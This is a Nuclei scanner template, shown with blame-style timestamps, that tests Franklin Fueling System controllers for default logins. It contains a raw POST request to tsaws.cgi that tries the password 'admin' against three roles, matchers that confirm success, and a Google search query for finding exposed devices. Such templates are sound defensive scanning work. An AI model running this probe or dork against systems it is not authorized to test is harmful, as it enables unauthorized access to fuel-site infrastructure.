2023-10-17 07:20:28 +00:00
id : franklin-fueling-default-login
info :
2023-10-17 18:01:21 +00:00
name : Franklin Fueling System - Default Login
2023-10-17 07:20:28 +00:00
author : r3Y3r53
severity : high
description : |
A default password vulnerability refers to a security flaw that arises when a system or device is shipped or set up with a pre-configured, default password that is commonly known or easily guessable.
reference :
- https://www.exploitalert.com/view-details.html?id=39466
metadata :
verified : true
max-request : 1
2023-10-17 17:52:26 +00:00
google-query : inurl:"relay_status.html"
2023-10-17 07:20:28 +00:00
tags : default-login,franklin
http :
- raw :
- |
POST /21408623/cgi-bin/tsaws.cgi HTTP/1.1
Host : {{Hostname}}
Content-Type : text/xml
2023-10-17 08:16:05 +00:00
2023-10-17 07:20:28 +00:00
<TSA_REQUEST_LIST PASSWORD="{{password}}"><TSA_REQUEST COMMAND="cmdWebCheckRole" ROLE="{{username}}"/></TSA_REQUEST_LIST>
attack : pitchfork
payloads :
username :
- roleAdmin
- roleUser
- roleGuest
password :
- admin
matchers :
- type : dsl
dsl :
- 'status_code == 200'
- 'contains(content_type, "text/xml")'
2023-10-17 18:01:21 +00:00
- 'contains(body, "</TSA_RESPONSE_LIST>")'
2023-10-17 07:20:28 +00:00
- 'contains(body, "roleAdmin") || contains(body, "roleUser") || contains(body, "roleGuest")'
condition : and
2023-11-27 09:19:41 +00:00
# digest: 4b0a00483046022100d5fb1d6e90816511a5ca93642f672cdf7dac17f76021b2e075536aa8ff53569a022100b25f24690490e8a5c05269f473a92f475477111a20a37dfc80da558bd20ff70d:922c64590222798bb761d5b6d8e72950